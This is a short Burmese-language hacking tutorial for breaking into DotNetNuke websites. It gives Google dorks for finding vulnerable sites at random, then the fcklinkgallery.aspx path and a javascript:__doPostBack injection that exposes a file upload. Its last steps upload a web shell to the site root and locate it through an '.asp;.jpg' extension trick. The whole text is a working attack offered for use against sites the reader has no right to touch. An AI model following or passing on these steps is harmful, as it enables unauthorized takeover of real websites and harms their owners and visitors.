Step 1 : www.google.com ကို သြားလိုက္ပါ။

Step 2 : ေအာက္မွာ ေပးထားတဲ ့dork ၂ ခု ထဲ က တစ္ခုခု ကို google search မွာ copy/paste လုပ္ပီး ရွာလိုက္ပါ။ ( က်ေနာ့္အေနနဲ ့ကေတာ့ ဒုတိယ တစ္ခုကို ပိုျပီး အသံုးျပဳပါလို ့အၾကံေပးခ်င္ပါတယ္ )

:inurl:/tabid/36/language/en-US/Default.aspx

:inurl:/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 3 : Vulnerable sites ေတြ ကို ေတြ ့ရပါလိမ့္မယ္ အဆင္ေျပရာ ႏွစ္သက္ရာ တစ္ဆိုဒ္ ကို ေရြးလိုက္ပါ

Step 4 : တကယ္လို ့ သင္ဟာ Step 2 : မွာတုန္းက ပထမ dork  ကိုသာ ေရြးျခယ္ခဲ့မယ္ဆိုရင္ ေတာ့

/Home/tabid/36/Language/en-US/Default.aspx 

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

ကိုအစားထိုးလိုက္ပါ။



Note***






Step 5 :  တကယ္လို ့အဆင္ေျပေျပနဲ ့ Link Gallery Page ေပၚလာတယ္ဆိုရင္ေတာ့  address bar URL မွာ ေအာက္ကေပးထားတဲ ့Script ေလး ထည့္ေပးလုိက္ပါ။

javascript:__doPostBack('ctlURL$cmdUpload','')

Step 6 :  ဒါဆိုရင္ေတာ့ file upload လုပ္ဖို ့အတြက္ option တစ္ခု ေပၚလာပါလိမ့္မယ္





Step 7 : Root ဆိုတာကို ေရြးလိုက္ပါ။

Step 8 : ျပီးရင္ေတာ့ မိမိ shell ကို upload လုပ္လိုက္လို ့ရပါျပီ။


*** upload လုပ္ထားတဲ့ shell ကို ျပန္ရွာခ်င္ရင္ေတာ့

www.victimsite.com/portals/0/yourshellname.asp;.jpg

အဲ့ဒီ format အတိုင္းျပန္ရွာႏုိင္ပါတယ္ victimsite.com ေနရာမွာ မိမိ ေရြးခ်ယ္ထားတဲ ့target site နဲ ့
yourshellname ေနရာမွာ ေတာ့ မိမိ တင္လိုက္တဲ ့shell နာမည္ကို ထည့္ရမွာျဖစ္ပါတယ္။